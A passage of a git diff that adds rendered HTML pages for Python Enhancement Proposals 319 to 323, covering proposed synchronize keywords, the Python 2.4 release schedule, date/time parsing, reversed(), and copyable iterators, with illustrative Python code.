+                l=thread.allocate_lock()
+                l.acquire()
+                pool.append(l)
+                thread.start_new_thread(ZServerPublisher,
+                                        (self.accept,))
+                n=n-1
+
+    def accept(self):
+        synchronize:
+            pool, requests, ready = self._lists
+            while not requests:
+                l=pool[-1]
+                del pool[-1]
+                ready.append(l)
+
+                asynchronize:
+                    l.acquire()
+
+                pool.append(l)
+
+            r=requests[0]
+            del requests[0]
+            return r
+
+    def handle(self, name, request, response):
+        synchronize:
+            pool, requests, ready = self._lists
+            requests.append((name, request, response))
+            if ready:
+                l=ready[-1]
+                del ready[-1]
+                l.release()
+
+
+

Here is the original class as found in the +‘Zope/ZServer/PubCore/ZRendevous.py’ module. The “convenience” of +the ‘_a’ and ‘_r’ shortcut names obscure the code:

+
import thread
+from ZServerPublisher import ZServerPublisher
+
+class ZRendevous:
+
+    def __init__(self, n=1):
+        sync=thread.allocate_lock()
+        self._a=sync.acquire
+        self._r=sync.release
+        pool=[]
+        self._lists=pool, [], []
+        self._a()
+        try:
+            while n > 0:
+                l=thread.allocate_lock()
+                l.acquire()
+                pool.append(l)
+                thread.start_new_thread(ZServerPublisher,
+                                        (self.accept,))
+                n=n-1
+        finally: self._r()
+
+    def accept(self):
+        self._a()
+        try:
+            pool, requests, ready = self._lists
+            while not requests:
+                l=pool[-1]
+                del pool[-1]
+                ready.append(l)
+                self._r()
+                l.acquire()
+                self._a()
+                pool.append(l)
+
+            r=requests[0]
+            del requests[0]
+            return r
+        finally: self._r()
+
+    def handle(self, name, request, response):
+        self._a()
+        try:
+            pool, requests, ready = self._lists
+            requests.append((name, request, response))
+            if ready:
+                l=ready[-1]
+                del ready[-1]
+                l.release()
+        finally: self._r()
+
+
+

In particular the asynchronize section of the accept method is +not very obvious. To beginner programmers, ‘synchronize’ and +‘asynchronize’ remove many of the problems encountered when +juggling multiple acquire and release methods on different +locks in different try/finally blocks.

+
+
+

Formal Syntax

+

Python syntax is defined in a modified BNF grammar notation +described in the Python Language Reference [1]. This section +describes the proposed synchronization syntax using this grammar:

+
synchronize_stmt: 'synchronize' [test] ':' suite
+asynchronize_stmt: 'asynchronize' [test] ':' suite
+compound_stmt: ... | synchronize_stmt | asynchronize_stmt
+
+
+

(The ‘…’ indicates other compound statements elided).

+
+
+

Proposed Implementation

+

The author of this PEP has not explored an implementation yet. +There are several implementation issues that must be resolved. +The main implementation issue is what exactly gets locked and +unlocked during a synchronized block.

+

During an unqualified synchronized block (the use of the +‘synchronize’ keyword without a target argument) a lock could be +created and associated with the synchronized code block object. +Any threads that are to execute the block must first acquire the +code block lock.

+

When an ‘asynchronize’ keyword is encountered in a ‘synchronize’ +block the code block lock is unlocked before the inner block is +executed and re-locked when the inner block terminates.

+
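<p>To make those semantics concrete, here is a rough sketch (not part of the PEP) of what the interpreter would effectively do for one unqualified block, expressed with the modern threading module; the name codeblock_lock is purely illustrative:</p>

import threading

codeblock_lock = threading.Lock()   # the hidden per-block lock described above

def run_block():
    codeblock_lock.acquire()            # entering 'synchronize:'
    try:
        # ... synchronized work ...
        codeblock_lock.release()        # entering 'asynchronize:'
        try:
            pass                        # ... unsynchronized work ...
        finally:
            codeblock_lock.acquire()    # re-lock when the inner block ends
    finally:
        codeblock_lock.release()        # unlock when the outer block ends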

When a synchronized block target is specified the object is +associated with a lock. How this is implemented cleanly is +probably the highest risk of this proposal. Java Virtual Machines +typically associate a special hidden lock object with target +object and use it to synchronized the block around the target +only.

+
+
+

Backward Compatibility

+

Backward compatibility is solved with the new from __future__ +Python syntax (PEP 236), and the new warning framework (PEP 230) +to evolve the +Python language into phasing out any conflicting names that use +the new keywords ‘synchronize’ and ‘asynchronize’. To use the +syntax now, a developer could use the statement:

+
from __future__ import threadsync  # or whatever
+
+
+

In addition, any code that uses the keyword ‘synchronize’ or +‘asynchronize’ as an identifier will be issued a warning from +Python. After the appropriate period of time, the syntax would +become standard, the above import statement would do nothing, and +any identifiers named ‘synchronize’ or ‘asynchronize’ would raise +an exception.

+
+
+

PEP 310 Reliable Acquisition/Release Pairs

+

PEP 310 proposes the ‘with’ keyword that can serve the same +function as ‘synchronize’ (but no facility for ‘asynchronize’). +The pattern:

+
initialize_lock()
+
+with the_lock:
+    change_shared_data()
+
+
+

is equivalent to the proposed:

+
synchronize the_lock:
+    change_shared_data()
+
+
+

PEP 310 must synchronize on an existing lock, while this PEP +proposes that unqualified ‘synchronize’ statements synchronize on +a global, internal, transparent lock in addition to qualified +‘synchronize’ statements. The ‘with’ statement also requires lock +initialization, while the ‘synchronize’ statement can synchronize +on any target object including locks.

+

While limited in this fashion, the ‘with’ statement is more +abstract and serves more purposes than synchronization. For +example, transactions could be used with the ‘with’ keyword:

+
initialize_transaction()
+
+with my_transaction:
+    do_in_transaction()
+
+# when the block terminates, the transaction is committed.
+
+
+

The ‘synchronize’ and ‘asynchronize’ keywords cannot serve this or +any other general acquire/release pattern other than thread +synchronization.

+
+
+

How Java Does It

+

Java defines a ‘synchronized’ keyword (note the grammatical tense +different between the Java keyword and this PEP’s ‘synchronize’) +which must be qualified on any object. The syntax is:

+
synchronized (Expression) Block
+
+
+

Expression must yield a valid object (null raises an error and +exceptions during ‘Expression’ terminate the ‘synchronized’ block +for the same reason) upon which ‘Block’ is synchronized.

+
+
+

How Jython Does It

+

Jython uses a ‘synchronize’ class with the static method +‘make_synchronized’ that accepts one callable argument and returns +a newly created, synchronized, callable “wrapper” around the +argument.

+
+
+

Summary of Proposed Changes to Python

+

Adding new ‘synchronize’ and ‘asynchronize’ keywords to the +language.

+
+
+

Risks

+

This PEP proposes adding two keywords to the Python language. This +may break code.

+

There is no implementation to test.

+

It’s not the most important problem facing Python programmers +today (although it is a fairly notorious one).

+

The equivalent Java keyword is the past participle ‘synchronized’. +This PEP proposes the present tense, ‘synchronize’ as being more +in spirit with Python (there being less distinction between +compile-time and run-time in Python than Java).

+
+
+

Dissenting Opinion

+

This PEP has not been discussed on python-dev.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0319.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0320/index.html b/pep-0320/index.html new file mode 100644 index 00000000000..1ba266093cb --- /dev/null +++ b/pep-0320/index.html @@ -0,0 +1,327 @@ + PEP 320 – Python 2.4 Release Schedule | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 320 – Python 2.4 Release Schedule

+
+
Author:
+
Barry Warsaw, Raymond Hettinger, Anthony Baxter
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
29-Jul-2003
+
Python-Version:
+
2.4
+
Post-History:
+
01-Dec-2004
+
+
+
+
+
+

Abstract

+

This document describes the development and release schedule for +Python 2.4. The schedule primarily concerns itself with PEP-sized +items. Small features may be added up to and including the first +beta release. Bugs may be fixed until the final release.

+

There will be at least two alpha releases, two beta releases, and +one release candidate. The release date was 30th November, 2004.

+
+
+

Release Manager

+

Anthony Baxter

+

Martin von Lowis is building the Windows installers, Fred the +doc packages, Sean the RPMs.

+
+
+

Release Schedule

+
    +
  • July 9: alpha 1 [completed]
  • +
  • August 5/6: alpha 2 [completed]
  • +
  • Sept 3: alpha 3 [completed]
  • +
  • October 15: beta 1 [completed]
  • +
  • November 3: beta 2 [completed]
  • +
  • November 18: release candidate 1 [completed]
  • +
  • November 30: final [completed]
  • +
+
+
+

Completed features for 2.4

+
    +
  • PEP 218 Builtin Set Objects.
  • +
  • PEP 289 Generator expressions.
  • +
  • PEP 292 Simpler String Substitutions to be implemented as a module.
  • +
  • PEP 318: Function/method decorator syntax, using @syntax
  • +
  • PEP 322 Reverse Iteration.
  • +
  • PEP 327: A Decimal package for fixed precision arithmetic.
  • +
  • PEP 328: Multi-line Imports
  • +
  • Encapsulate the decorate-sort-undecorate pattern in a keyword for +list.sort().
  • +
  • Added a builtin called sorted() which may be used in expressions.
  • +
  • The itertools module has two new functions, tee() and groupby().
  • +
  • Add a collections module with a deque() object.
  • +
  • Add two statistical/reduction functions, nlargest() and nsmallest() +to the heapq module.
  • +
  • Python’s Windows installer now uses MSI
  • +
+
+
+

Deferred until 2.5

+
    +
  • Deprecate and/or remove the modules listed in PEP 4 (posixfile, +gopherlib, pre, others)
  • +
  • Remove support for platforms as described in PEP 11.
  • +
  • Finish implementing the Distutils bdist_dpkg command. (AMK)
  • +
  • Add support for reading shadow passwords [1]
  • +
  • It would be nice if the built-in SSL socket type could be used +for non-blocking SSL I/O. Currently packages such as Twisted +which implement async servers using SSL have to require third-party +packages such as pyopenssl.
  • +
  • AST-based compiler: this branch was not completed in time for +2.4, but will land on the trunk some time after 2.4 final is +out, for inclusion in 2.5.
  • +
  • reST is going to be used a lot in Zope3. Maybe it could become +a standard library module? (Since reST’s author thinks it’s too +unstable, I’m inclined not to do this.)
  • +
+
+
+

Ongoing tasks

+

The following are ongoing TO-DO items which we should attempt to +work on without hoping for completion by any particular date.

+
    +
  • Documentation: complete the distribution and installation +manuals.
  • +
  • Documentation: complete the documentation for new-style +classes.
  • +
  • Look over the Demos/ directory and update where required (Andrew +Kuchling has done a lot of this)
  • +
  • New tests.
  • +
  • Fix doc bugs on SF.
  • +
  • Remove use of deprecated features in the core.
  • +
  • Document deprecated features appropriately.
  • +
  • Mark deprecated C APIs with Py_DEPRECATED.
  • +
  • Deprecate modules which are unmaintained, or perhaps make a new +category for modules ‘Unmaintained’
  • +
  • In general, lots of cleanup so it is easier to move forward.
  • +
+
+
+

Open issues

+

None at this time.

+
+
+

Carryover features from Python 2.3

+
    +
  • The import lock could use some redesign. [2]
  • +
  • A nicer API to open text files, replacing the ugly (in some +people’s eyes) “U” mode flag. There’s a proposal out there to +have a new built-in type textfile(filename, mode, encoding). +(Shouldn’t it have a bufsize argument too?)
  • +
  • New widgets for Tkinter???

    Has anyone gotten the time for this? Are there any new +widgets in Tk 8.4? Note that we’ve got better Tix support +already (though not on Windows yet).

    +
  • +
  • PEP 304 (Controlling Generation of Bytecode Files by Montanaro) +seems to have lost steam.
  • +
  • For a class defined inside another class, the __name__ should be +“outer.inner”, and pickling should work. ([3]. I’m no +longer certain this is easy or even right.)
  • +
  • Decide on a clearer deprecation policy (especially for modules) +and act on it. For a start, see this message from Neal Norwitz [4]. +There seems insufficient interest in moving this further in an +organized fashion, and it’s not particularly important.
  • +
  • Provide alternatives for common uses of the types module; +Skip Montanaro has posted a proto-PEP for this idea [5]. +There hasn’t been any progress on this, AFAICT.
  • +
  • Use pending deprecation for the types and string modules. This +requires providing alternatives for the parts that aren’t +covered yet (e.g. string.whitespace and types.TracebackType). +It seems we can’t get consensus on this.
  • +
  • PEP 262 Database of Installed Python Packages (Kuchling)

    This turns out to be useful for Jack Jansen’s Python installer, +so the database is worth implementing. Code will go in +sandbox/pep262.

    +
  • +
  • PEP 269 Pgen Module for Python (Riehl)

    (Some necessary changes are in; the pgen module itself needs to +mature more.)

    +
  • +
  • PEP 266 Optimizing Global Variable/Attribute Access (Montanaro)

    PEP 267 Optimized Access to Module Namespaces (Hylton)

    +

    PEP 280 Optimizing access to globals (van Rossum)

    +

    These are basically three friendly competing proposals. Jeremy +has made a little progress with a new compiler, but it’s going +slowly and the compiler is only the first step. Maybe we’ll be +able to refactor the compiler in this release. I’m tempted to +say we won’t hold our breath.

    +
  • +
  • Lazily tracking tuples? [6] [7] +Not much enthusiasm I believe.
  • +
  • PEP 286 Enhanced Argument Tuples (von Loewis)

    I haven’t had the time to review this thoroughly. It seems a +deep optimization hack (also makes better correctness guarantees +though).

    +
  • +
  • Make ‘as’ a keyword. It has been a pseudo-keyword long enough. +Too much effort to bother.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0320.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0321/index.html b/pep-0321/index.html new file mode 100644 index 00000000000..822fc70cc08 --- /dev/null +++ b/pep-0321/index.html @@ -0,0 +1,239 @@ + PEP 321 – Date/Time Parsing and Formatting | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 321 – Date/Time Parsing and Formatting

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
16-Sep-2003
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

Python 2.3 added a number of simple date and time types in the +datetime module. There’s no support for parsing strings in various +formats and returning a corresponding instance of one of the types. +This PEP proposes adding a family of predefined parsing function for +several commonly used date and time formats, and a facility for generic +parsing.

+

The types provided by the datetime module all have +.isoformat() and .ctime() methods that return string +representations of a time, and the .strftime() method can be used +to construct new formats. There are a number of additional +commonly-used formats that would be useful to have as part of the +standard library; this PEP also suggests how to add them.

+
+
+

Input Formats

+

Useful formats to support include:

+
    +
  • ISO8601
  • +
  • ARPA/RFC 2822
  • +
  • ctime
  • +
  • Formats commonly written by humans such as the American +“MM/DD/YYYY”, the European “DD/MM/YYYY”, and variants such as +“DD-Month-YYYY”.
  • +
  • CVS-style or tar-style dates (“tomorrow”, “12 hours ago”, etc.)
  • +
+

XXX The Perl ParseDate.pm module supports many different input formats, +both absolute and relative. Should we try to support them all?

+

Options:

+
    +
  1. Add functions to the datetime module (see also the sketch after this list):
    import datetime
    +d = datetime.parse_iso8601("2003-09-15T10:34:54")
    +
    +
    +
  2. +
  3. Add class methods to the various types. There are already various +class methods such as .now(), so this would be pretty natural:
    import datetime
    +d = datetime.date.parse_iso8601("2003-09-15T10:34:54")
    +
    +
    +
  4. +
  5. Add a separate module (possible names: date, date_parse, parse_date) +or subpackage (possible names: datetime.parser) containing parsing +functions:
    import datetime
    +d = datetime.parser.parse_iso8601("2003-09-15T10:34:54")
    +
    +
    +
  6. +
+

Unresolved questions:

+
    +
  • Naming convention to use.
  • +
  • What exception to raise on errors? ValueError, or a specialized exception?
  • +
  • Should you know what type you’re expecting, or should the parsing figure +it out? (e.g. parse_iso8601("yyyy-mm-dd") returns a date instance, +but parsing “yyyy-mm-ddThh:mm:ss” returns a datetime.) Should +there be an option to signal an error if a time is provided where +none is expected, or if no time is provided?
  • +
  • Anything special required for I18N? For time zones?
  • +
+
+
+

Generic Input Parsing

+

Is a strptime() implementation that returns datetime types sufficient?

+

XXX if yes, describe strptime here. Can the existing pure-Python +implementation be easily retargeted?

+
+
+

Output Formats

+

Not all input formats need to be supported as output formats, because it’s +pretty trivial to get the strftime() argument right for simple things +such as YYYY/MM/DD. Only complicated formats need to be supported; RFC 2822 +is currently the only one I can think of.

+

Options:

+
    +
  1. Provide predefined format strings (see also the sketch after this list), so you could write this:
    import datetime
    +d = datetime.datetime(...)
    +print d.strftime(d.RFC2822_FORMAT) # or datetime.RFC2822_FORMAT?
    +
    +
    +
  2. +
  3. Provide new methods on all the objects:
    d = datetime.datetime(...)
    +print d.rfc822_time()
    +
    +
    +
  4. +
+

Relevant functionality in other languages includes the PHP date +function (Python implementation by Simon Willison at +http://simon.incutio.com/archive/2003/10/07/dateInPython)

+
+
+

References

+

Other useful links:

+

http://www.egenix.com/files/python/mxDateTime.html +http://ringmaster.arc.nasa.gov/tools/time_formats.html +http://www.thinkage.ca/english/gcos/expl/b/lib/0tosec.html +https://moin.conectiva.com.br/DateUtil

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0321.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0322/index.html b/pep-0322/index.html new file mode 100644 index 00000000000..2f8c35a098a --- /dev/null +++ b/pep-0322/index.html @@ -0,0 +1,292 @@ + PEP 322 – Reverse Iteration | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 322 – Reverse Iteration

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
24-Sep-2003
+
Python-Version:
+
2.4
+
Post-History:
+
24-Sep-2003
+
+
+
+
+
+

Abstract

+

This proposal is to add a builtin function to support reverse +iteration over sequences.

+
+
+

Motivation

+

For indexable objects, current approaches for reverse iteration are +error prone, unnatural, and not especially readable:

+
for i in xrange(n-1, -1, -1):
+    print seqn[i]
+
+
+

One other current approach involves reversing a list before iterating +over it. That technique wastes computer cycles, memory, and lines of +code:

+
rseqn = list(seqn)
+rseqn.reverse()
+for value in rseqn:
+    print value
+
+
+

Extended slicing is a third approach that minimizes the code overhead +but does nothing for memory efficiency, beauty, or clarity.

+

Reverse iteration is much less common than forward iteration, but it +does arise regularly in practice. See Real World Use Cases below.

+
+
+

Proposal

+

Add a builtin function called reversed() that makes a reverse +iterator over sequence objects that support __getitem__() and +__len__().

+

The above examples then simplify to:

+
for i in reversed(xrange(n)):
+    print seqn[i]
+
+
+
for elem in reversed(seqn):
+    print elem
+
+
+

The core idea is that the clearest, least error-prone way of specifying +reverse iteration is to specify it in a forward direction and then say +reversed.

+

The implementation could be as simple as:

+
def reversed(x):
+    if hasattr(x, 'keys'):
+        raise ValueError("mappings do not support reverse iteration")
+    i = len(x)
+    while i > 0:
+        i -= 1
+        yield x[i]
+
+
+

No language syntax changes are needed. The proposal is fully backwards +compatible.

+

A C implementation and unit tests are at: https://bugs.python.org/issue834422

+
+
+

BDFL Pronouncement

+

This PEP has been conditionally accepted for Py2.4. The condition means +that if the function is found to be useless, it can be removed before +Py2.4b1.

+
+
+

Alternative Method Names

+
    +
  • reviter – Jeremy Fincher’s suggestion matches use of iter()
  • +
  • ireverse – uses the itertools naming convention
  • +
  • inreverse – no one seems to like this one except me
  • +
+

The name reverse is not a candidate because it duplicates the name +of the list.reverse() which mutates the underlying list.

+
+
+

Discussion

+

The case against adoption of the PEP is a desire to keep the number of +builtin functions small. This needs to weighed against the simplicity +and convenience of having it as builtin instead of being tucked away in +some other namespace.

+
+
+

Real World Use Cases

+

Here are some instances of reverse iteration taken from the standard +library and comments on why reverse iteration was necessary:

+
    +
  • atexit.exit_handlers() uses:
    while _exithandlers:
    +    func, targs, kargs = _exithandlers.pop()
    +        . . .
    +
    +
    +

    In this application popping is required, so the new function would +not help.

    +
  • +
  • heapq.heapify() uses for i in xrange(n//2 - 1, -1, -1) because +higher-level orderings are more easily formed from pairs of +lower-level orderings. A forward version of this algorithm is +possible; however, that would complicate the rest of the heap code +which iterates over the underlying list in the opposite direction. +The replacement code for i in reversed(xrange(n//2)) makes +clear the range covered and how many iterations it takes.
  • +
  • mhlib.test() uses:
    testfolders.reverse();
    +for t in testfolders:
    +    do('mh.deletefolder(%s)' % `t`)
    +
    +
    +

    The need for reverse iteration arises because the tail of the +underlying list is altered during iteration.

    +
  • +
  • platform._dist_try_harder() uses +for n in range(len(verfiles)-1,-1,-1) because the loop deletes +selected elements from verfiles but needs to leave the rest of +the list intact for further iteration.
  • +
  • random.shuffle() uses for i in xrange(len(x)-1, 0, -1) because +the algorithm is most easily understood as randomly selecting +elements from an ever diminishing pool. In fact, the algorithm can +be run in a forward direction but is less intuitive and rarely +presented that way in literature. The replacement code +for i in reversed(xrange(1, len(x))) is much easier +to verify visually.
  • +
  • rfc822.Message.__delitem__() uses:
    list.reverse()
    +for i in list:
    +    del self.headers[i]
    +
    +
    +

    The need for reverse iteration arises because the tail of the +underlying list is altered during iteration.

    +
  • +
+
+
+

Rejected Alternatives

+

Several variants were submitted that attempted to apply reversed() +to all iterables by running the iterable to completion, saving the +results, and then returning a reverse iterator over the results. +While satisfying some notions of full generality, running the input +to the end is contrary to the purpose of using iterators +in the first place. Also, a small disaster ensues if the underlying +iterator is infinite.

+

Putting the function in another module or attaching it to a type object +is not being considered. Like its cousins, zip() and enumerate(), +the function needs to be directly accessible in daily programming. Each +solves a basic looping problem: lock-step iteration, loop counting, and +reverse iteration. Requiring some form of dotted access would interfere +with their simplicity, daily utility, and accessibility. They are core +looping constructs, independent of any one application domain.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0322.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0323/index.html b/pep-0323/index.html new file mode 100644 index 00000000000..dfdaf9a29bc --- /dev/null +++ b/pep-0323/index.html @@ -0,0 +1,571 @@ + PEP 323 – Copyable Iterators | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 323 – Copyable Iterators

+
+
Author:
+
Alex Martelli <aleaxit at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
25-Oct-2003
+
Python-Version:
+
2.5
+
Post-History:
+
29-Oct-2003
+
+
+
+
+
+

Deferral

+

This PEP has been deferred. Copyable iterators are a nice idea, but after +four years, no implementation or widespread interest has emerged.

+
+
+

Abstract

+

This PEP suggests that some iterator types should support shallow +copies of their instances by exposing a __copy__ method which meets +some specific requirements, and indicates how code using an iterator +might exploit such a __copy__ method when present.

+
+
+

Update and Comments

+

Support for __copy__ was included in Py2.4’s itertools.tee().

+

Adding __copy__ methods to existing iterators will change the +behavior under tee(). Currently, the copied iterators remain +tied to the original iterator. If the original advances, then +so do all of the copies. Good practice is to overwrite the +original so that anomalies don’t result: a,b=tee(a). +Code that doesn’t follow that practice may observe a semantic +change if a __copy__ method is added to an iterator.

+
+
+

Motivation

+

In Python up to 2.3, most built-in iterator types don’t let the user +copy their instances. User-coded iterators that do let their clients +call copy.copy on their instances may, or may not, happen to return, +as a result of the copy, a separate iterator object that may be +iterated upon independently from the original.

+

Currently, “support” for copy.copy in a user-coded iterator type is +almost invariably “accidental” – i.e., the standard machinery of the +copy method in Python’s standard library’s copy module does build and +return a copy. However, the copy will be independently iterable with +respect to the original only if calling .next() on an instance of that +class happens to change instance state solely by rebinding some +attributes to new values, and not by mutating some attributes’ +existing values.

+

For example, an iterator whose “index” state is held as an integer +attribute will probably give usable copies, since (integers being +immutable) .next() presumably just rebinds that attribute. On the +other hand, another iterator whose “index” state is held as a list +attribute will probably mutate the same list object when .next() +executes, and therefore copies of such an iterator will not be +iterable separately and independently from the original.

+

Given this existing situation, copy.copy(it) on some iterator object +isn’t very useful, nor, therefore, is it at all widely used. However, +there are many cases in which being able to get a “snapshot” of an +iterator, as a “bookmark”, so as to be able to keep iterating along +the sequence but later iterate again on the same sequence from the +bookmark onwards, is useful. To support such “bookmarking”, module +itertools, in 2.4, has grown a ‘tee’ function, to be used as:

+
it, bookmark = itertools.tee(it)
+
+
+

The previous value of ‘it’ must not be used again, which is why this +typical usage idiom rebinds the name. After this call, ‘it’ and +‘bookmark’ are independently-iterable iterators on the same underlying +sequence as the original value of ‘it’: this satisfies application +needs for “iterator copying”.

+

However, when itertools.tee can make no hypotheses about the nature of +the iterator it is passed as an argument, it must save in memory all +items through which one of the two ‘teed’ iterators, but not yet both, +have stepped. This can be quite costly in terms of memory, if the two +iterators get very far from each other in their stepping; indeed, in +some cases it may be preferable to make a list from the iterator so as +to be able to step repeatedly through the subsequence, or, if that is +too costy in terms of memory, save items to disk, again in order to be +able to iterate through them repeatedly.

+

This PEP proposes another idea that will, in some important cases, +allow itertools.tee to do its job with minimal cost in terms of +memory; user code may also occasionally be able to exploit the idea in +order to decide whether to copy an iterator, make a list from it, or +use an auxiliary disk file.

+

The key consideration is that some important iterators, such as those +which built-in function iter builds over sequences, would be +intrinsically easy to copy: just get another reference to the same +sequence, and a copy of the integer index. However, in Python 2.3, +those iterators don’t expose the state, and don’t support copy.copy.

+

The purpose of this PEP, therefore, is to have those iterator types +expose a suitable __copy__ method. Similarly, user-coded iterator +types that can provide copies of their instances, suitable for +separate and independent iteration, with limited costs in time and +space, should also expose a suitable __copy__ method. While +copy.copy also supports other ways to let a type control the way +its instances are copied, it is suggested, for simplicity, that +iterator types that support copying always do so by exposing a +__copy__ method, and not in the other ways copy.copy supports.

+

Having iterators expose a suitable __copy__ when feasible will afford +easy optimization of itertools.tee and similar user code, as in:

+
def tee(it):
+    it = iter(it)
+    try: copier = it.__copy__
+    except AttributeError:
+        # non-copyable iterator, do all the needed hard work
+        # [snipped!]
+    else:
+        return it, copier()
+
+
+

Note that this function does NOT call “copy.copy(it)”, which (even +after this PEP is implemented) might well still “just happen to +succeed”. for some iterator type that is implemented as a user-coded +class. without really supplying an adequate “independently iterable” +copy object as its result.

+
+
+

Specification

+

Any iterator type X may expose a method __copy__ that is callable +without arguments on any instance x of X. The method should be +exposed if and only if the iterator type can provide copyability with +reasonably little computational and memory effort. Furthermore, the +new object y returned by method __copy__ should be a new instance +of X that is iterable independently and separately from x, stepping +along the same “underlying sequence” of items.

+

For example, suppose a class Iter essentially duplicated the +functionality of the iter builtin for iterating on a sequence:

+
class Iter(object):
+
+    def __init__(self, sequence):
+        self.sequence = sequence
+        self.index = 0
+
+    def __iter__(self):
+        return self
+
+    def next(self):
+        try: result = self.sequence[self.index]
+        except IndexError: raise StopIteration
+        self.index += 1
+        return result
+
+
+

To make this Iter class compliant with this PEP, the following +addition to the body of class Iter would suffice:

+
def __copy__(self):
+    result = self.__class__(self.sequence)
+    result.index = self.index
+    return result
+
+
+

Note that __copy__, in this case, does not even try to copy the +sequence; if the sequence is altered while either or both of the +original and copied iterators are still stepping on it, the iteration +behavior is quite likely to go awry anyway – it is not __copy__’s +responsibility to change this normal Python behavior for iterators +which iterate on mutable sequences (that might, perhaps, be the +specification for a __deepcopy__ method of iterators, which, however, +this PEP does not deal with).

+

Consider also a “random iterator”, which provides a nonterminating +sequence of results from some method of a random instance, called +with given arguments:

+
class RandomIterator(object):
+
+    def __init__(self, bound_method, *args):
+        self.call = bound_method
+        self.args = args
+
+    def __iter__(self):
+        return self
+
+    def next(self):
+        return self.call(*self.args)
+
+    def __copy__(self):
+        import copy, new
+        im_self = copy.copy(self.call.im_self)
+        method = new.instancemethod(self.call.im_func, im_self)
+        return self.__class__(method, *self.args)
+
+
+

This iterator type is slightly more general than its name implies, as +it supports calls to any bound method (or other callable, but if the +callable is not a bound method, then method __copy__ will fail). But +the use case is for the purpose of generating random streams, as in:

+
import random
+
+def show5(it):
+    for i, result in enumerate(it):
+        print '%6.3f'%result,
+        if i==4: break
+    print
+
+normit = RandomIterator(random.Random().gauss, 0, 1)
+show5(normit)
+copit = normit.__copy__()
+show5(normit)
+show5(copit)
+
+
+

which will display some output such as:

+
-0.536  1.936 -1.182 -1.690 -1.184
+ 0.666 -0.701  1.214  0.348  1.373
+ 0.666 -0.701  1.214  0.348  1.373
+
+
+

the key point being that the second and third lines are equal, because +the normit and copit iterators will step along the same “underlying +sequence”. (As an aside, note that to get a copy of self.call.im_self +we must use copy.copy, NOT try getting at a __copy__ method directly, +because for example instances of random.Random support copying via +__getstate__ and __setstate__, NOT via __copy__; indeed, using +copy.copy is the normal way to get a shallow copy of any object – +copyable iterators are different because of the already-mentioned +uncertainty about the result of copy.copy supporting these “copyable +iterator” specs).

+
+
+

Details

+

Besides adding to the Python docs a recommendation that user-coded +iterator types support a __copy__ method (if and only if it can be +implemented with small costs in memory and runtime, and produce an +independently-iterable copy of an iterator object), this PEP’s +implementation will specifically include the addition of copyability +to the iterators over sequences that built-in iter returns, and also +to the iterators over a dictionary returned by the methods __iter__, +iterkeys, itervalues, and iteritems of built-in type dict.

+

Iterators produced by generator functions will not be copyable. +However, iterators produced by the new “generator expressions” of +Python 2.4 (PEP 289) should be copyable if their underlying +iterator[s] are; the strict limitations on what is possible in a +generator expression, compared to the much vaster generality of a +generator, should make that feasible. Similarly, the iterators +produced by the built-in function enumerate, and certain functions +suppiled by module itertools, should be copyable if the underlying +iterators are.

+

The implementation of this PEP will also include the optimization of +the new itertools.tee function mentioned in the Motivation section.

+
+
+

Rationale

+

The main use case for (shallow) copying of an iterator is the same as +for the function itertools.tee (new in 2.4). User code will not +directly attempt to copy an iterator, because it would have to deal +separately with uncopyable cases; calling itertools.tee will +internally perform the copy when appropriate, and implicitly fallback +to a maximally efficient non-copying strategy for iterators that are +not copyable. (Occasionally, user code may want more direct control, +specifically in order to deal with non-copyable iterators by other +strategies, such as making a list or saving the sequence to disk).

+

A tee’d iterator may serve as a “reference point”, allowing processing +of a sequence to continue or resume from a known point, while the +other independent iterator can be freely advanced to “explore” a +further part of the sequence as needed. A simple example: a generator +function which, given an iterator of numbers (assumed to be positive), +returns a corresponding iterator, each of whose items is the fraction +of the total corresponding to each corresponding item of the input +iterator. The caller may pass the total as a value, if known in +advance; otherwise, the iterator returned by calling this generator +function will first compute the total.

+
def fractions(numbers, total=None):
+    if total is None:
+        numbers, aux = itertools.tee(numbers)
+        total = sum(aux)
+    total = float(total)
+    for item in numbers:
+        yield item / total
+
+
+

The ability to tee the numbers iterator allows this generator to +precompute the total, if needed, without necessarily requiring +O(N) auxiliary memory if the numbers iterator is copyable.

+

As another example of “iterator bookmarking”, consider a stream of +numbers with an occasional string as a “postfix operator” now and +then. By far most frequent such operator is a ‘+’, whereupon we must +sum all previous numbers (since the last previous operator if any, or +else since the start) and yield the result. Sometimes we find a ‘*’ +instead, which is the same except that the previous numbers must +instead be multiplied, not summed.

+
def filter_weird_stream(stream):
+    it = iter(stream)
+    while True:
+        it, bookmark = itertools.tee(it)
+        total = 0
+        for item in it:
+            if item=='+':
+                yield total
+                break
+            elif item=='*':
+                product = 1
+                for item in bookmark:
+                    if item=='*':
+                        yield product
+                        break
+                    else:
+                        product *= item
+            else:
+                total += item
+
+
+

Similar use cases of itertools.tee can support such tasks as +“undo” on a stream of commands represented by an iterator, +“backtracking” on the parse of a stream of tokens, and so on. +(Of course, in each case, one should also consider simpler +possibilities such as saving relevant portions of the sequence +into lists while stepping on the sequence with just one iterator, +depending on the details of one’s task).

+

